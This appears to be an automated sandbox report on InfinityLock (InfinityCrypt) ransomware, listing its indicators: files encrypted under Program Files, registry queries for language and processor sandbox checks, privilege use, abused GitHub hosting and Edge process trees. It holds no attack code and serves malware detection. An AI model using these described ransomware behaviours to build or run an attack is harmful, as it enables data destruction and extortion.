Analysis
-
max time kernel
130s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
30/01/2025, 22:03 UTC
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://bing.com
Resource
win10v2004-20250129-en
Errors
General
-
Target
http://bing.com
Malware Config
Signatures
-
InfinityLock Ransomware
Also known as InfinityCrypt. Based on the open-source HiddenTear ransomware.
-
Infinitylock family
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 139 raw.githubusercontent.com 140 raw.githubusercontent.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\variant.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_organize_18.svg.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\main.css.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Checkers.api.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\goopdateres_ur.dll.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_mi.dll.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_bow.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main.css.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\x_2x.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\VGX.dll.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pl_135x40.svg.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\new_icons.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforsignature.svg.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_2x.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\tr-tr\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\fake_logo.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_export_18.svg.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\circle_2x.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\add-comment.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons2x.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\es-es\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Bold.otf.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.dll.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\example_icons2x.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lv_get.svg.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\goopdateres_ca.dll.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\DirectInk.dll.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h2x.png.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-It.otf.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\AddInViews\Microsoft.Office.Tools.v9.0.dll.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\A3DUtils.dll.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\plugin.js.4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134 Endermanch@InfinityCrypt.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Endermanch@InfinityCrypt.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Endermanch@InfinityCrypt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Endermanch@InfinityCrypt.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "3" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2089655958-977706906-1981639424-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4204 msedge.exe 4204 msedge.exe 2352 msedge.exe 2352 msedge.exe 4340 identity_helper.exe 4340 identity_helper.exe 4648 msedge.exe 4648 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
pid Process 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2268 Endermanch@InfinityCrypt.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe 2352 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2468 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2352 wrote to memory of 1852 2352 msedge.exe 82 PID 2352 wrote to memory of 1852 2352 msedge.exe 82 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4036 2352 msedge.exe 83 PID 2352 wrote to memory of 4204 2352 msedge.exe 84 PID 2352 wrote to memory of 4204 2352 msedge.exe 84 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85 PID 2352 wrote to memory of 1252 2352 msedge.exe 85
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://bing.com1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd9d3946f8,0x7ffd9d394708,0x7ffd9d3947182⤵PID:1852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:22⤵PID:4036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,13794998830882946131,17513539038044745851,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:82⤵PID:1252
-
-
